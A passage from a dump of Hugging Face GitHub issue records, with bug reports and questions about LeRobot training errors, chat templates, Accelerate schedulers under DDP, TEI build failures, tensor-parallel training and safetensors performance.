\"/home/user/Documents/Research/RL/LeRobot/lerobot/src/lerobot/scripts/lerobot_train.py\", line 359, in main\n train()\n File \"/home/user/Documents/Research/RL/LeRobot/lerobot/src/lerobot/configs/parser.py\", line 225, in wrapper_inner\n response = fn(cfg, *args, **kwargs)\n ^^^^^^^^^^^^^^^^^^^^^^^^\n File \"/home/user/Documents/Research/RL/LeRobot/lerobot/src/lerobot/scripts/lerobot_train.py\", line 263, in train\n batch = next(dl_iter)\n ^^^^^^^^^^^^^\n File \"/home/user/Documents/Research/RL/LeRobot/lerobot/src/lerobot/datasets/utils.py\", line 917, in cycle\n yield next(iterator)\n ^^^^^^^^^^^^^^\n File \"/home/user/Documents/Research/RL/LeRobot/.venv/lib/python3.12/site-packages/torch/utils/data/dataloader.py\", line 734, in __next__\n data = self._next_data()\n ^^^^^^^^^^^^^^^^^\n File \"/home/user/Documents/Research/RL/LeRobot/.venv/lib/python3.12/site-packages/torch/utils/data/dataloader.py\", line 1516, in _next_data\n return self._process_data(data, worker_id)\n ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n File \"/home/user/Documents/Research/RL/LeRobot/.venv/lib/python3.12/site-packages/torch/utils/data/dataloader.py\", line 1551, in _process_data\n data.reraise()\n File \"/home/user/Documents/Research/RL/LeRobot/.venv/lib/python3.12/site-packages/torch/_utils.py\", line 769, in reraise\n raise exception\nNotImplementedError: Caught NotImplementedError in DataLoader worker process 0.\nOriginal Traceback (most recent call last):\n File \"/home/user/Documents/Research/RL/LeRobot/.venv/lib/python3.12/site-packages/torch/utils/data/_utils/worker.py\", line 349, in _worker_loop\n data = fetcher.fetch(index) # type: ignore[possibly-undefined]\n ^^^^^^^^^^^^^^^^^^^^\n File \"/home/user/Documents/Research/RL/LeRobot/.venv/lib/python3.12/site-packages/torch/utils/data/_utils/fetch.py\", line 52, in fetch\n data = [self.dataset[idx] for idx in possibly_batched_index]\n ~~~~~~~~~~~~^^^^^\n File \"/home/user/Documents/Research/RL/LeRobot/lerobot/src/lerobot/datasets/lerobot_dataset.py\", line 874, in __getitem__\n video_frames = self._query_videos(query_timestamps, ep_idx)\n ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n File 
\"/home/user/Documents/Research/RL/LeRobot/lerobot/src/lerobot/datasets/lerobot_dataset.py\", line 846, in _query_videos\n frames = decode_video_frames(video_path, shifted_query_ts, self.tolerance_s, self.video_backend)\n ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n File \"/home/user/Documents/Research/RL/LeRobot/lerobot/src/lerobot/datasets/video_utils.py\", line 69, in decode_video_frames\n return decode_video_frames_torchcodec(video_path, timestamps, tolerance_s)\n ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n File \"/home/user/Documents/Research/RL/LeRobot/lerobot/src/lerobot/datasets/video_utils.py\", line 248, in decode_video_frames_torchcodec\n decoder = decoder_cache.get_decoder(str(video_path))\n ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n File \"/home/user/Documents/Research/RL/LeRobot/lerobot/src/lerobot/datasets/video_utils.py\", line 193, in get_decoder\n decoder = VideoDecoder(file_handle, seek_mode=\"approximate\")\n ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n File \"/home/user/Documents/Research/RL/LeRobot/.venv/lib/python3.12/site-packages/torchcodec/decoders/_video_decoder.py\", line 89, in __init__\n self._decoder = create_decoder(source=source, seek_mode=seek_mode)\n ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n File \"/home/user/Documents/Research/", "url": "https://github.com/huggingface/lerobot/issues/2072", "state": "closed", "labels": [], "created_at": "2025-09-27T19:52:42Z", "updated_at": "2025-11-08T07:53:00Z", "user": "cijerezg" }, { "repo": "huggingface/text-generation-inference", "number": 3333, "title": "How to use prefix caching", "body": "Hi\nI can't find a way to turn on the prefix caching\n\nWhen I run any model, I always get:\nUsing prefix caching = False\n\nThanks a lot", "url": "https://github.com/huggingface/text-generation-inference/issues/3333", "state": "open", "labels": [], "created_at": "2025-09-27T14:14:37Z", "updated_at": "2025-09-29T11:52:48Z", "user": "Noha-Magdy" }, { "repo": "huggingface/smol-course", "number": 259, "title": "[QUESTION] Is this a bug in smollmv3's chat template?", "body": "\nHi \n\nI am reading this \nhttps://huggingface.co/learn/smol-course/unit1/2#chat-templates-with-tools\n\nI feel like there is a bug in `HuggingFaceTB/SmolLM3-3B` 's chat template\n\nfrom the example\n\n```\n# Conversation with tool usage\nmessages = [\n {\"role\": \"system\", \"content\": \"You are a helpful assistant with access to tools.\"},\n {\"role\": \"user\", \"content\": \"What's the weather like in Paris?\"},\n {\n \"role\": \"assistant\", \n \"content\": \"I'll check the weather in Paris for you.\",\n \"tool_calls\": [\n {\n \"id\": \"call_1\",\n \"type\": \"function\",\n \"function\": {\n \"name\": \"get_weather\",\n \"arguments\": '{\"location\": \"Paris, France\", \"unit\": \"celsius\"}'\n }\n }\n ]\n },\n {\n \"role\": \"tool\",\n \"tool_call_id\": \"call_1\", \n \"content\": '{\"temperature\": 22, \"condition\": \"sunny\", \"humidity\": 60}'\n },\n {\n \"role\": \"assistant\",\n \"content\": \"The weather in Paris is currently sunny with a temperature of 22\u00b0C and 60% humidity. 
It's a beautiful day!\"\n }\n]\n\n# Apply chat template with tools\nformatted_with_tools = tokenizer.apply_chat_template(\n messages,\n tools=tools,\n tokenize=False,\n add_generation_prompt=False\n)\n\nprint(\"Chat template with tools:\")\nprint(formatted_with_tools)\n```\n\n\nI got this result\n\n```\nChat template with tools:\n<|im_start|>system\n## Metadata\n\nKnowledge Cutoff Date: June 2025\nToday Date: 27 September 2025\nReasoning Mode: /think\n\n## Custom Instructions\n\nYou are a helpful assistant with access to tools.\n\n### Tools\n\nYou may call one or more functions to assist with the user query.\nYou are provided with function signatures within XML tags:\n\n\n{'type': 'function', 'function': {'name': 'get_weather', 'description': 'Get the current weather for a location', 'parameters': {'type': 'object', 'properties': {'location': {'type': 'string', 'description': 'The city and state, e.g. San Francisco, CA'}, 'unit': {'type': 'string', 'enum': ['celsius', 'fahrenheit'], 'description': 'The temperature unit'}}, 'required': ['location']}}}\n{'type': 'function', 'function': {'name': 'calculate', 'description': 'Perform mathematical calculations', 'parameters': {'type': 'object', 'properties': {'expression': {'type': 'string', 'description': 'Mathematical expression to evaluate'}}, 'required': ['expression']}}}\n\n\nFor each function call, return a json object with function name and arguments within XML tags:\n\n{\"name\": , \"arguments\": }\n\n\n<|im_end|>\n<|im_start|>user\nWhat's the weather like in Paris?<|im_end|>\n<|im_start|>assistant\nI'll check the weather in Paris for you.<|im_end|>\n<|im_start|>user\n{\"temperature\": 22, \"condition\": \"sunny\", \"humidity\": 60}<|im_end|>\n<|im_start|>assistant\nThe weather in Paris is currently sunny with a temperature of 22\u00b0C and 60% humidity. It's a beautiful day!<|im_end|>\n\n```\n\nWhich is kind of weird.\nThe first thing is there is no tool call in below message\n```\n<|im_start|>assistant\nI'll check the weather in Paris for you.<|im_end|>\n```\n\nI expect it to have ` ... 
` in it.\n\nThe second thing is why the `tool` role got replaced with the `user` role.\nShouldn't we explicitly specify the role?\n\nCan someone help me with this, please?", "url": "https://github.com/huggingface/smol-course/issues/259", "state": "closed", "labels": [ "question" ], "created_at": "2025-09-27T10:19:37Z", "updated_at": "2025-11-24T18:40:09Z", "user": "Nevermetyou65" }, { "repo": "huggingface/accelerate", "number": 3797, "title": "Question: ReduceLROnPlateau wrapped by AcceleratedScheduler in DDP may multiply LR by num_processes?", "body": "Hi,\n\nI\u2019m using ReduceLROnPlateau wrapped by AcceleratedScheduler in a multi-GPU / DDP setup (num_processes=8).\n\nMy main process calls:\n```\nlr_scheduler = torch.optim.lr_scheduler.ReduceLROnPlateau(\n optimizer, mode=\"min\", factor=self.hyper_params['lr_decay_factor'], patience=self.hyper_params['lr_reduce_patient']\n)\nmodel, optimizer, train_loader, val_loader, lr_scheduler, = accelerator.prepare(\n model_bundle.model, optimizer, data_loaders.train_loader, data_loaders.val_loader, lr_scheduler\n)\nfor epoch in range(self.hyper_params['epochs']):\n # train...\n val_loss = self.eval()\n lr_scheduler.step(val_loss)\n\n```\nI noticed that AcceleratedScheduler.step() does:\n```\nnum_processes = AcceleratorState().num_processes\nfor _ in range(num_processes):\n # Special case when using OneCycle and `drop_last` was not used\n if hasattr(self.scheduler, \"total_steps\"):\n if self.scheduler._step_count <= self.scheduler.total_steps:\n self.scheduler.step(*args, **kwargs)\n else:\n self.scheduler.step(*args, **kwargs)\n```\nWill this cause the LR to be reduced num_processes times for a single validation step?\n\nThanks!", "url": "https://github.com/huggingface/accelerate/issues/3797", "state": "closed", "labels": [], "created_at": "2025-09-26T10:02:20Z", "updated_at": "2025-11-03T15:08:09Z", "comments": 1, "user": "nicelulu" }, { "repo": "huggingface/lerobot", "number": 2050, "title": "I wonder how to use RL on so101 within sim environment?", "body": "", "url": "https://github.com/huggingface/lerobot/issues/2050", "state": "closed", "labels": [ "question", "simulation", "good first issue" ], "created_at": "2025-09-26T06:52:38Z", "updated_at": "2025-10-08T18:04:44Z", "user": "Temmp1e" }, { "repo": "huggingface/lerobot", "number": 2045, "title": "I would appreciate it if you could explain how to train the slicing clay model", "body": "I am planning to conduct a clay-cutting task using pi0. Since this type of task is not typically included among pi0\u2019s foundation model tasks, I would like to inquire how many episodes (and the approximate duration of each) would generally be required for such a custom task.\n\nThe task I have in mind involves cutting clay in this manner, and I am uncertain whether it can be made to work effectively. 
I would greatly appreciate any realistic advice or guidance you could provide on this matter.\n\n\"Image\"", "url": "https://github.com/huggingface/lerobot/issues/2045", "state": "open", "labels": [], "created_at": "2025-09-26T00:51:59Z", "updated_at": "2025-09-26T00:51:59Z", "user": "pparkgyuhyeon" }, { "repo": "huggingface/lerobot", "number": 2042, "title": "Question: How to train to get Task Recovery behavior?", "body": "We would need the robot to be able to detect a failure (like dropping an object) and attempt to correct it to continue with the task.\n\nHow would the training data would look like for this?\n\nThanks", "url": "https://github.com/huggingface/lerobot/issues/2042", "state": "open", "labels": [], "created_at": "2025-09-25T15:52:55Z", "updated_at": "2025-09-25T15:52:55Z", "user": "raul-machine-learning" }, { "repo": "huggingface/accelerate", "number": 3794, "title": "Error when evaluating with multi-gpu", "body": "I met a problem when evaluating Llada-8B with multi-gpu ( **Nvidia V100** ) using accelerate+lm_eval. Error occurs when **num_processes>1**.\nbut there is no problem with single GPU, all the other cfgs are the same.\nHow can i solve this problem?\nI use this command to evaluate\n\n accelerate launch --config_file config1.yaml eval_llada.py --tasks ${task} --num_fewshot ${num_fewshot} \\\n --confirm_run_unsafe_code --model llada_dist \\\n --model_args model_path='/raid/data/zhouy/model_data/LLaDA-8B-Instruct', \n gen_length=${length},steps=${length},block_length=${block_length},show_speed=True \n\nThis is my config1.yaml\n\n compute_environment: LOCAL_MACHINE \n debug: false\n distributed_type: MULTI_GPU\n downcast_bf16: 'no'\n enable_cpu_affinity: false\n machine_rank: 0\n main_process_ip: null\n main_process_port: 5678\n main_training_function: main\n mixed_precision: fp16\n num_machines: 1\n num_processes: 2\n rdzv_backend: static\n same_network: true\n tpu_env: []\n tpu_use_cluster: false\n tpu_use_sudo: false\n use_cpu: false\n\nHere is the Error logs:\n\n [rank1]: Traceback (most recent call last):\n [rank1]: File \"/home/zhouy/dllm/Fast-dLLM-main/llada/eval_llada.py\", line 364, in \n [rank1]: cli_evaluate()\n [rank1]: File \"/raid/data/zhouy/anaconda3/envs/dllm/lib/python3.9/site-packages/lm_eval/__main__.py\", line 389, in cli_evaluate\n [rank1]: results = evaluator.simple_evaluate(\n [rank1]: File \"/raid/data/zhouy/anaconda3/envs/dllm/lib/python3.9/site-packages/lm_eval/utils.py\", line 422, in _wrapper\n [rank1]: return fn(*args, **kwargs)\n [rank1]: File \"/raid/data/zhouy/anaconda3/envs/dllm/lib/python3.9/site-packages/lm_eval/evaluator.py\", line 308, in simple_evaluate\n [rank1]: results = evaluate(\n [rank1]: File \"/raid/data/zhouy/anaconda3/envs/dllm/lib/python3.9/site-packages/lm_eval/utils.py\", line 422, in _wrapper\n [rank1]: return fn(*args, **kwargs)\n [rank1]: File \"/raid/data/zhouy/anaconda3/envs/dllm/lib/python3.9/site-packages/lm_eval/evaluator.py\", line 528, in evaluate\n [rank1]: resps = getattr(lm, reqtype)(cloned_reqs)\n [rank1]: File \"/home/zhouy/dllm/Fast-dLLM-main/llada/eval_llada.py\", line 312, in generate_until\n [rank1]: generated_answer, nfe = generate_with_dual_cache(self.model, input_ids, steps=self.steps, gen_length=self.gen_length, block_length=self.block_length, \n [rank1]: File \"/raid/data/zhouy/anaconda3/envs/dllm/lib/python3.9/site-packages/torch/utils/_contextlib.py\", line 116, in decorate_context\n [rank1]: return func(*args, **kwargs)\n [rank1]: File \"/home/zhouy/dllm/Fast-dLLM-main/llada/generate.py\", line 
208, in generate_with_dual_cache\n [rank1]: output = model(x, use_cache=True)\n [rank1]: File \"/raid/data/zhouy/anaconda3/envs/dllm/lib/python3.9/site-packages/torch/nn/modules/module.py\", line 1736, in _wrapped_call_impl\n [rank1]: return self._call_impl(*args, **kwargs)\n [rank1]: File \"/raid/data/zhouy/anaconda3/envs/dllm/lib/python3.9/site-packages/torch/nn/modules/module.py\", line 1747, in _call_impl\n [rank1]: return forward_call(*args, **kwargs)\n [rank1]: File \"/raid/data/zhouy/anaconda3/envs/dllm/lib/python3.9/site-packages/torch/nn/parallel/distributed.py\", line 1643, in forward\n [rank1]: else self._run_ddp_forward(*inputs, **kwargs)\n [rank1]: File \"/raid/data/zhouy/anaconda3/envs/dllm/lib/python3.9/site-packages/torch/nn/parallel/distributed.py\", line 1459, in _run_ddp_forward\n [rank1]: return self.module(*inputs, **kwargs) # type: ignore[index]\n [rank1]: File \"/raid/data/zhouy/anaconda3/envs/dllm/lib/python3.9/site-packages/torch/nn/modules/module.py\", line 1736, in _wrapped_call_impl\n [rank1]: return self._call_impl(*args, **kwargs)\n [rank1]: File \"/raid/data/zhouy/anaconda3/envs/dllm/lib/python3.9/site-packages/torch/nn/modules/module.py\", line 1747, in _call_impl\n [rank1]: return forward_call(*args, **kwargs)\n [rank1]: File \"/raid/data/zhouy/anaconda3/envs/dllm/lib/python3.9/site-packages/accelerate/utils/operations.py\", line 818, in forward\n [rank1]: return model_forward(*args, **kwargs)\n [rank1]: File \"/raid/data/zhouy/anaconda3/envs/dllm/lib/python3.9/site-packages/accelerate/utils/operations.py\", line 806, in __call__\n [rank1]: return convert_to_fp32(self.model_forward(*args, **kwargs))\n [rank1]: File \"/raid/data/zhouy/anaconda3/envs/dllm/lib/python3.9/site-packages/torch/amp/autocast_mode.py\", line 44, in decorate_autocast\n [rank1]: return func(*args, **kwargs)\n [rank1]: File \"/home/zhouy/dllm/Fast-dLLM-main/llada/model/modeling_llada.py\", line 1582, in forward\n [rank1]: outputs = self.model.forward(\n [rank1]: File \"/home/zhouy/dllm/Fast-dLLM-main/llada/model/modeling_llada.py\", line 1479, in forward\n [rank1]: x, cache = block(x, attention_bias=attention_bias, layer_past=layer_past, use_ca", "url": "https://github.com/huggingface/accelerate/issues/3794", "state": "closed", "labels": [], "created_at": "2025-09-25T14:42:29Z", "updated_at": "2025-11-03T15:08:12Z", "comments": 1, "user": "adfad1" }, { "repo": "huggingface/text-embeddings-inference", "number": 728, "title": "Compile error in multiple environments for CPU backend", "body": "### System Info\n\nTEI source code: \n\n- Latest main branch(0c1009bfc49b759fe75eed4fd377b4fbad534ad5); \n- Latest release `v1.8.2`; \n- Release `v1.8.1`\n\nTested platform: \n\n- Win: AMD 7950X+Windows 10 x64 Version 10.0.19045.6332; \n- WSL2: AMD 7950X+Debian 13 on wsl2 (Linux DESKTOP 5.15.167.4-microsoft-standard-WSL2 # 1 SMP Tue Nov 5 00:21:55 UTC 2024 x86_64 GNU/Linux) @ Windows 10 x64 Version 10.0.19045.6332; \n- Linux: Intel 6133*2+Ubuntu 20.04;\n\n(GPUs is not mentioned due to build TEI on CPU)\n\nTested rustup envs: \n\nFreshly installed rustup: default rustup profile: cargo 1.85.1 (d73d2caf9 2024-12-31)\n- Win: Freshly installed rustup & Freshly installed MSVC v143 -VS 2022 C++ build tools+Winodws 11 SDK (10.0.22621.0)+cmake\n- WSL: Freshly installed rustup & gcc (Debian 14.2.0-19) 14.2.0\n- Linux: Freshly installed rustup & gcc (GCC) 10.5.0\n\n### Information\n\n- [ ] Docker\n- [x] The CLI directly\n\n### Tasks\n\n- [x] An officially supported command\n- [ ] My own modifications\n\n### 
Reproduction\n\nAs docs' recommend, tested on 3 different envs listed above:\n\n1. `curl --proto '=https' --tlsv1.2 -sSf https://sh.rustup.rs | sh`\n2. `cargo install --path router -F mkl --verbose` (added `--verbose` for logging)\n\nShows compile error about **25 undefined references / external symbol** (`'vsTanh', 'vsSub', 'vsSqrt', 'vsSin', 'vsMul', 'vsLn', 'vsFmin', 'vsExp', 'vsDiv', 'vsCos', 'vsAdd', 'vdTanh', 'vdSub', 'vdSqrt', 'vdSin', 'vdMul', 'vdLn', 'vdFmin', 'vdExp', 'vdDiv', 'vdCos', 'vdAdd', 'sgemm_', 'hgemm_', 'dgemm_'`)\n\n### Expected behavior\n\nExpect finishing compile, but:\n\n- Compile v1.8.2/v1.8.1/main (similar error) on Win+MSVC+AMD CPU:\n\n```\n...\nRunning `C:\\Users\\nkh04\\.rustup\\toolchains\\1.85.1-x86_64-pc-windows-msvc\\bin\\rustc.exe --crate-name text_embeddings_router --edition=2021 router\\src\\main.rs --error-format=json --json=diagnostic-rendered-ansi,artifacts,future-incompat --diagnostic-width=115 --crate-type bin --emit=dep-info,link -C opt-level=3 -C panic=abort -C lto=fat -C codegen-units=1 --cfg \"feature=\\\"candle\\\"\" --cfg \"feature=\\\"default\\\"\" --cfg \"feature=\\\"dynamic-linking\\\"\" --cfg \"feature=\\\"http\\\"\" --cfg \"feature=\\\"mkl\\\"\" --check-cfg cfg(docsrs,test) --check-cfg \"cfg(feature, values(\\\"accelerate\\\", \\\"candle\\\", \\\"candle-cuda\\\", \\\"candle-cuda-turing\\\", \\\"candle-cuda-volta\\\", \\\"default\\\", \\\"dynamic-linking\\\", \\\"google\\\", \\\"grpc\\\", \\\"http\\\", \\\"metal\\\", \\\"mkl\\\", \\\"ort\\\", \\\"python\\\", \\\"static-linking\\\"))\" -C metadata=e1406d246b8c925f --out-dir F:\\text-embeddings-inference-1.8.2\\target\\release\\deps -C strip=symbols -L dependency=F:\\text-embeddings-inference-1.8.2\\target\\release\\deps --extern anyhow=F:\\text-embeddings-inference-1.8.2\\target\\release\\deps\\libanyhow-5751be73768123a3.rlib --extern axum=F:\\text-embeddings-inference-1.8.2\\target\\release\\deps\\libaxum-8bc59cf51b8d1ae2.rlib --extern axum_tracing_opentelemetry=F:\\text-embeddings-inference-1.8.2\\target\\release\\deps\\libaxum_tracing_opentelemetry-6919ca207315f42e.rlib --extern base64=F:\\text-embeddings-inference-1.8.2\\target\\release\\deps\\libbase64-20907aaabfa37a5c.rlib --extern clap=F:\\text-embeddings-inference-1.8.2\\target\\release\\deps\\libclap-ded1b8a7f6da29a7.rlib --extern futures=F:\\text-embeddings-inference-1.8.2\\target\\release\\deps\\libfutures-55e1ce906ca8ce43.rlib --extern hf_hub=F:\\text-embeddings-inference-1.8.2\\target\\release\\deps\\libhf_hub-46162d037bf61d01.rlib --extern http=F:\\text-embeddings-inference-1.8.2\\target\\release\\deps\\libhttp-721bb5a8d4ad5af4.rlib --extern init_tracing_opentelemetry=F:\\text-embeddings-inference-1.8.2\\target\\release\\deps\\libinit_tracing_opentelemetry-1130e5d6b02b3c83.rlib --extern intel_mkl_src=F:\\text-embeddings-inference-1.8.2\\target\\release\\deps\\libintel_mkl_src-7de47f7e38d141d5.rlib --extern metrics=F:\\text-embeddings-inference-1.8.2\\target\\release\\deps\\libmetrics-f38f63f59a9e401d.rlib --extern metrics_exporter_prometheus=F:\\text-embeddings-inference-1.8.2\\target\\release\\deps\\libmetrics_exporter_prometheus-3e83484daaaf9a40.rlib --extern mimalloc=F:\\text-embeddings-inference-1.8.2\\target\\release\\deps\\libmimalloc-55786f97dafb497c.rlib --extern num_cpus=F:\\text-embeddings-inference-1.8.2\\target\\release\\deps\\libnum_cpus-26f3f7fb7d16b825.rlib --extern opentelemetry=F:\\text-embeddings-inference-1.8.2\\target\\release\\deps\\libopentelemetry-43ce590757d45ebb.rlib --extern 
opentelemetry_otlp=F:\\text-embeddings-inference-1.8.2\\target\\release\\deps\\libopentelemetry_otlp-7adf99fb9a924955.rlib --extern opentelemetry_sdk=F:\\text-embeddings-inference-1.8.2\\target\\release\\deps\\libopentelemetry_sdk-48d11cd15d38a406.rlib --extern reqwest=F:\\text-embeddings-inference-1.8.2\\target\\release\\deps\\libreqwest-cdbb64c7917c22c9.rlib --extern serde=F:\\text-embeddings-inference-1.8.2\\target\\release\\deps\\libserde-e13a1b310cb83bc5.rlib --extern serde_json=F:\\text-embeddings-inference-1.8.2\\target\\release\\deps\\libserde_json-c2074a4721fb3f74.rlib --extern simsimd=F:\\text-embeddings-inference-1.8.2\\target\\release\\deps\\libsimsimd-5bf7050b419eab84.rlib --extern text_embeddings_bac", "url": "https://github.com/huggingface/text-embeddings-inference/issues/728", "state": "open", "labels": [ "documentation", "question" ], "created_at": "2025-09-25T11:52:16Z", "updated_at": "2025-11-18T14:49:01Z", "user": "nkh0472" }, { "repo": "huggingface/transformers", "number": 41141, "title": "Need a concise example of Tensor Parallelism (TP) training using Trainer/SFTTrainer.", "body": "### Feature request\n\nI have checked the code and there are a few places that talk about TP. I saw that the model's from_pretrained method accepts tp_plan and device_mesh. I also checked that TrainingArguments can take a parallelism_config, which defines the TP/CP plan along with FSDP. However, I am not able to successfully stitch things together to make TP-only training work. Please help.\n\nRef: \n- https://github.com/huggingface/transformers/blob/main/examples/3D_parallel.py\n\n### Motivation\n\nI need to enable TP-only training, but no tutorial or example is available.\n\n### Your contribution\n\nGiven proper understanding and guidance, I can come up with a clean example and documentation for it.", "url": "https://github.com/huggingface/transformers/issues/41141", "state": "open", "labels": [ "Documentation", "Feature request", "Tensor Parallel" ], "created_at": "2025-09-25T03:01:02Z", "updated_at": "2026-01-04T14:05:36Z", "comments": 10, "user": "meet-minimalist" }, { "repo": "huggingface/lerobot", "number": 2034, "title": "dataset v2.1 and groot n1.5", "body": "For now, GR00T does not support dataset v3.0 for fine-tuning? In this case, should we continue using v2.1? And if we have already collected data in v3.0, how can we convert it back to v2.1?", "url": "https://github.com/huggingface/lerobot/issues/2034", "state": "open", "labels": [ "question", "policies", "dataset" ], "created_at": "2025-09-24T21:12:26Z", "updated_at": "2025-12-24T00:05:45Z", "user": "zujian-y" }, { "repo": "huggingface/tokenizers", "number": 1868, "title": "How to set the cache_dir in the Rust implementation?", "body": "Hey, thank you for your great work with these tokenizers. \n\nWhen I use the tokenizers through the Python API via transformers, I can set a specific cache_dir like this:\n```\nfrom transformers import AutoTokenizer\nself.tokenizer = AutoTokenizer.from_pretrained(self.tokenizer_name, cache_dir=self.cache_dir)\n```\n\nHow can I do that in Rust? 
How can I print the default cache dir (in Rust)?", "url": "https://github.com/huggingface/tokenizers/issues/1868", "state": "open", "labels": [], "created_at": "2025-09-24T18:50:38Z", "updated_at": "2025-10-06T04:25:46Z", "user": "sambaPython24" }, { "repo": "huggingface/diffusers", "number": 12386, "title": "Implement missing features on ModularPipeline", "body": "As I'm looking to take advantage of the new `ModularPipeline`, the ask is to implement some currently missing features.\n\nMy use case is to convert an existing model loaded via a standard pipeline into a modular pipeline; that functionality was provided via #11915 and is now working.\n\nThe first minor obstacle is that the modular pipeline does not have defined params for execution. In a standard pipeline I can inspect the `__call__` signature to see which params are allowed. I currently work around this using\n`possible = [input_param.name for input_param in model.blocks.inputs]`\nPlease advise if this is acceptable.\n\nThe second issue is that modular pipelines don't seem to implement normal callbacks at all (e.g. `callback_on_step_end_tensor_inputs`); at the minimum we need some kind of callback functionality to capture interim latents on each step.\n\nThe third is more cosmetic - the modular pipeline does implement `set_progress_bar_config`, but it's not doing anything as it's not implemented on the actual block (tested with `StableDiffusionXLModularPipeline`).\n\ncc @yiyixuxu @DN6 @sayakpaul ", "url": "https://github.com/huggingface/diffusers/issues/12386", "state": "open", "labels": [ "roadmap" ], "created_at": "2025-09-24T15:49:23Z", "updated_at": "2025-09-29T05:46:29Z", "comments": 0, "user": "vladmandic" }, { "repo": "huggingface/candle", "number": 3096, "title": "[Question] Minimal documentation/example on including weights in compiled executable", "body": "Just what the title says: Is there a minimal code example on including weights in the compiled executable using include_bytes? 
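For the `ModularPipeline` parameter-discovery point in diffusers#12386 above, here is a small sketch built around the workaround the reporter already quotes. The `blocks.inputs` attribute comes from the issue itself; `intermediate_inputs` is an assumption on my part and may not exist on a given diffusers release.

```python
def allowed_params(pipe):
    """Collect the input names a modular pipeline accepts at call time.

    Sketch only: `pipe.blocks.inputs` is taken from the issue's workaround;
    `intermediate_inputs` is an assumed attribute, hence the hasattr guard.
    """
    names = {p.name for p in pipe.blocks.inputs}
    if hasattr(pipe.blocks, "intermediate_inputs"):
        names |= {p.name for p in pipe.blocks.intermediate_inputs}
    return sorted(names)
```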
Nervous to implement this without understanding best practices and end up with a suboptimal solution.", "url": "https://github.com/huggingface/candle/issues/3096", "state": "closed", "labels": [], "created_at": "2025-09-24T02:47:28Z", "updated_at": "2025-10-07T04:49:26Z", "comments": 1, "user": "bitanath" }, { "repo": "huggingface/optimum-executorch", "number": 149, "title": "Add documentation for how to run each type of exported model on ExecuTorch", "body": "Blocked on runner / multimodal runner work in ExecuTorch", "url": "https://github.com/huggingface/optimum-executorch/issues/149", "state": "open", "labels": [], "created_at": "2025-09-23T18:53:55Z", "updated_at": "2025-09-23T18:54:00Z", "user": "jackzhxng" }, { "repo": "huggingface/safetensors", "number": 653, "title": "`get_slice` is slow because it uses `tensors()` method instead of `info()`", "body": "### Feature request\n\nReplace \n```rust\nself.metadata.tensors().get(name)\n```\nwith\n```rust\nself.metadata.info(name)\n```\nin `get_slice` method\n\n### Motivation\n\nI noticed that the `get_slice` method of `Open` [does](https://github.com/huggingface/safetensors/blob/0816a1ae1d6b731cefd67f061d80d1cadd0dd7bb/bindings/python/src/lib.rs#L851) \n```rust\nself.metadata.tensors().get(name)\n````\ninstead of\n```rust\nself.metadata.info(name)\n```\nlike `get_tensor()` [does](https://github.com/huggingface/safetensors/blob/0816a1ae1d6b731cefd67f061d80d1cadd0dd7bb/bindings/python/src/lib.rs#L638) when retrieving `TensorInfo` by name.\n\nBecause of this, `get_slice` is much slower, since the `tensors()` method [reconstructs](https://github.com/huggingface/safetensors/blob/0816a1ae1d6b731cefd67f061d80d1cadd0dd7bb/safetensors/src/tensor.rs#L633) a new `HashMap` on each call.\n\nIs there any particular reason for this approach? Would it be possible to replace it with `self.metadata.info(name)` to improve performance?\n\n\n### Your contribution\n\nI do not mind doing a PR", "url": "https://github.com/huggingface/safetensors/issues/653", "state": "closed", "labels": [], "created_at": "2025-09-23T15:09:51Z", "updated_at": "2025-09-28T16:42:45Z", "comments": 1, "user": "PgLoLo" }, { "repo": "huggingface/diffusers", "number": 12375, "title": "What kernels should we integrate in Diffusers?", "body": "Now that we have an [integration](https://github.com/huggingface/diffusers/pull/12236) with the `kernels` lib to use Flash Attention 3 (FA3), it'd be nice to gather community interest about which kernels we should try to incorporate in the library through the [`kernels` lib](https://github.com/huggingface/kernels/). FA3 delivers a significant speedup on Hopper GPUs.\n\nI have done some work in the `kernelize` branch to see if replacing `GELU`, `SiLU`, and `RMSNorm` with their optimized kernels would have any speedups on Flux. So far, it hasn't had any. Benchmarking script: https://gist.github.com/sayakpaul/35236dd96e15d9f7d658a7ad11918411. One can compare the changes here: https://github.com/huggingface/diffusers/compare/kernelize?expand=1. \n\n> [!NOTE]\n> The changes in the `kernelize` branch are quite hacky as we're still evaluating things.\n\nPlease use this issue to let us know which kernels we should try to support in Diffusers. Some notes to keep in mind:\n\n* Layers where the `forward()` method is easily replaceable with the `kernelize()` [mechanism](https://github.com/huggingface/kernels/blob/main/docs/source/layers.md#kernelizing-a-model) would be prioritized. A reference is here: https://github.com/huggingface/transformers/pull/38205. 
\n* Even if a kernel isn't directly compatible with `kernels`, we can try to make it so, like we have for https://huggingface.co/kernels-community/flash-attn3.\n* Not all kernels contribute non-trivial gains in terms of speedup. So, please bear that in mind when proposing a kernel.\n\nCc: @MekkCyber", "url": "https://github.com/huggingface/diffusers/issues/12375", "state": "open", "labels": [ "performance" ], "created_at": "2025-09-23T09:03:13Z", "updated_at": "2025-09-30T06:56:39Z", "comments": 8, "user": "sayakpaul" }, { "repo": "huggingface/peft", "number": 2798, "title": "Add stricter type checking in LoraConfig for support with HfArgumentParser", "body": "### System Info\n\nSystem Info\ntransformers version: 4.57.0.dev0\nPlatform: Linux-5.14.0-284.73.1.el9_2.x86_64-x86_64-with-glibc2.39\nPython version: 3.12.3\nHuggingface_hub version: 0.34.4\nSafetensors version: 0.5.2\nAccelerate version: 1.10.1\nAccelerate config: not found\nDeepSpeed version: not installed\nPyTorch version (accelerator?): 2.8.0+cu128 (CUDA)\nTensorflow version (GPU?): not installed (NA)\nFlax version (CPU?/GPU?/TPU?): not installed (NA)\nJax version: not installed\nJaxLib version: not installed\nUsing distributed or parallel set-up in script?: No\nUsing GPU in script?: No\nGPU type: NVIDIA A100-SXM4-80GB\npeft version: 0.17.1\n\n### Who can help?\n\n@benjaminbossan 